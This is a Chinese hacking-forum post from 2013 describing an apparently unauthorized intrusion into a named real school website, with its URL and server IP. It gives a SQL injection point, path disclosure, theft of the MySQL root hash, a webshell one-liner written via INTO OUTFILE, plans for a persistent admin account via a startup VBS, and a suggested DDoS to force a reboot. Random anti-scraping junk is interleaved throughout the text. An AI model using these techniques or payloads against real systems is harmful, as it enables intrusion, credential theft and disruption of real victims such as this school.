找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2653|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏# P  |! O7 y9 ?
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
6 c0 }! P  D) y; ]& [9 `( H" m+ L" e/ Z
, ^7 k3 w$ N1 p: x0 @  \
9 M, K2 v) N! m: i
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 7 W$ v7 e. h  z. @" T0 r$ o# A9 m
9 e8 J+ y% S0 D" r0 ~* b
那么想可以直接写入shell ,getshell有几个条件:
5 }& \, D# ~1 D0 e+ V8 K5 m
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF5 K8 U, ~; _6 n9 i; U; M- W$ P

1 C/ W0 F2 m% q( s# P- ^- c  h试着爆绝对路径:
! F3 i! b2 C# N8 v0 R, h! ^0 Z, R1./phpMyAdmin/index.php?lang[]=1  
" U( ^* X& u% i% T5 |  ?# m5 f2./phpMyAdmin/phpinfo.php  , O, H  @4 q% Q0 ?7 B
3./load_file()  * O% e( ]5 u3 m; k: ^& i: u
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  9 t2 y9 ?* W; _  R+ _
5./phpmyadmin/libraries/select_lang.lib.php  5 P4 \5 p: ^% s& n. X
6./phpmyadmin/libraries/lect_lang.lib.php  
  s7 V) c) }1 T9 h/ P3 ^7./phpmyadmin/libraries/mcrypt.lib.php   8 F# L2 [- k) k6 |  P
8./phpmyadmin/libraries/export/xls.php  
* }5 O' {7 t! }2 C+ P4 G
% {1 [$ E8 N0 W均不行...........................  Q" Z# L" f* R. U  a

; j  |+ t( U( `* T+ B御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php! d" E+ C+ G) R% C! {6 N
1 X+ ]0 o' U9 `' {' S& V5 q- a- @
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin $ n5 [. R, X  N

& |4 M3 I: |. G9 v1 m默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败7 Q: q1 M6 O, U% K5 E9 d# \; i
5 q+ L0 ~6 N& y! D* e
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
" p5 _  n( k' w' X$ s3 o5 h( z( O# j/ U! J. M# Q
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
# E9 |: M  U% l0 o: I" o* U
- p3 R; G! A. ^* A1 V: A% ehttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini $ f, @8 G9 B, s6 i+ {

9 Y7 M; \2 L- `. u自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 t! R  s+ T, h& v9 @/ _
  |5 t1 ^" j# o& Q* ]
成功读到root密码:: u/ R$ C9 z, Y; R: m( }
9 m1 t; E1 o0 J+ `
17---- r(0072)0 F! L. X& {  R* f
18---- o(006f)
! B4 m# }, f2 @# e4 ~2 ^/ U19---- o(006f)
: s. l5 F; F: z+ c: p. j. j; c$ a20---- t(0074)
' q! g# J( i% q2 _* Z' Q+ @7 e21---- *(002a)- ?) i/ G4 T* Z7 |$ R& }
22---- 8(0038)
" h( |% ^1 r% E! Z23---- 2(0032)
7 C; y/ \- V* J4 A24---- E(0045)" l. y& o0 [9 L% J  I  B0 q* e
25---- 1(0031)% r4 k; p, c  l6 N) G# \
26---- C(0043)
! j: k4 O( s. l! b& s- a. h27---- 5(0035)
- m9 C- a" a/ \5 D28---- 8(0038)& L; P2 ~5 ]) f; s5 z# X! `. c
29---- 2(0032)
7 k/ ?# u, X. V2 H; F# R0 q5 W: w  d30---- 8(0038)3 e1 ]+ g7 w7 H. g' i+ F; [
31---- A(0041)
$ J5 |$ ?/ z* {+ }3 v7 q8 a5 {: \32---- 9(0039)
/ T4 |* O# k) M" s1 e8 x9 b' Q33---- B(0042)
! y6 c0 ?/ ^/ E& {/ _' D* o5 v; I34---- 5(0035)) z5 G* J2 c& W9 h0 V
35---- 4(0034), g0 \6 O4 q: {$ [) X' ?' s
36---- 8(0038); s4 |4 d" S6 S# W' e
37---- 6(0036)
6 Y0 M4 p& `7 z' D38---- 4(0034)
% n7 y+ @' ~2 r1 Y, h! G3 b39---- 9(0039)8 ~& A7 H6 T# ~! e0 k, u0 n
40---- 1(0031)
' [1 y; N! |7 J: s9 j41---- 1(0031)0 s3 y% X1 Z6 G1 R
42---- 5(0035)
; e! E3 {; o) U& p43---- 3(0033)! ~+ b6 S3 n7 {& J: G) G
44---- 5(0035)0 _# w; z. T6 ~/ }8 i, t
45---- 9(0039)
, @$ r1 ^. h4 T$ @46---- 8(0038)
. }  `7 _; d: X% F47---- F(0046)- i2 [( W/ y% t
48---- F(0046)
: K( t' E0 C  }" T# i49---- 4(0034)
* Y: r# g' `: E- V) \: c# j50---- F(0046)0 b! n- a* ]& R7 _7 r3 s1 p0 C
51---- 0(0030)
% M$ X' n9 i7 T. F4 H" P! @+ h  s52---- 3(0033)  {, R. w' o; I4 j, y$ L
53---- 2(0032)+ Y$ |4 @8 p% [$ N  s5 }2 q# ^
54---- A(0041)" e, {( y# ~* s& Q2 H
55---- 4(0034)
0 R% j0 C# y( X9 G; V2 i% ^) i56---- A(0041)
; M7 r# U" n0 E+ O/ Q. v57---- B(0042)7 v: \; K& {" V' N
58---- *(0044)
9 Y& q2 H6 m+ U59---- *(0035)9 i2 n$ l9 M9 b* f7 |
60---- *(0041)
1 Y$ P0 s. Q# h8 ^8 Q( D# E; X3 C61---- *0032)& F0 |; R3 r' L; Y$ O! O9 c- Y
( v( u" M, z7 @$ q) `9 l" A
解密后成功登陆phpmyamin& C0 ?, x) ?) k5 b
                          
- C2 v8 ?9 s1 T6 {+ z' g! c5 S9 q8 f# {  w1 F  M& o
                             . H7 x+ l  B+ ~) p1 w( q; ?

. o  i: l" b, P# o找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( N+ r0 z' L8 c9 i4 h  f
, X8 O* H# N3 U* W5 ~& P成功执行,拿下shell,菜刀连接:7 F4 i6 t1 V9 m' f( }! m  w

( n; U. W8 I9 X* C服务器不支持asp,aspx,php提权无果...................7 W" f& t+ J, ~& h& P
/ x( h# F$ x3 D- F, V5 Y& c
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:' h6 V4 C; F, F$ D6 ?
服务器上已经有个隐藏帐号了

' P4 V/ l+ t% U2 H" b
别名     administrators
6 K' u8 O, G# ]注释     管理员对计算机/域有不受限制的完全访问权

# B5 v  U! a# a1 c# \* \3 d6 W
成员

% h$ T# k3 L% k- z* |; o' k
-------------------------------------------------------------------------------
) B6 l8 o  t9 D; ~2 G5 madmin/ Y3 _/ B# w* l
Administrator' \6 x" i! e0 ]* z' C) k
slipper$
4 Z" w9 a5 F! Ysqluser/ w1 h6 F  _* Q+ s( t% P; w& x
命令成功完成。 4 y/ k: |9 K! n! X* [+ b  H
+ ~/ t$ U) T3 ^# g2 V6 U
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
5 d& k7 g! T: l4 O6 I0 L; `6 O" h& m( E, {8 x+ ]' N
ddos服务器重启,不然就只能坐等服务器重启了...............................+ ]( v6 W. R7 ?/ `" _+ c; v7 S
; V- ?2 |5 s5 A" R
      
/ n* L6 }0 |+ w7 W( o

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表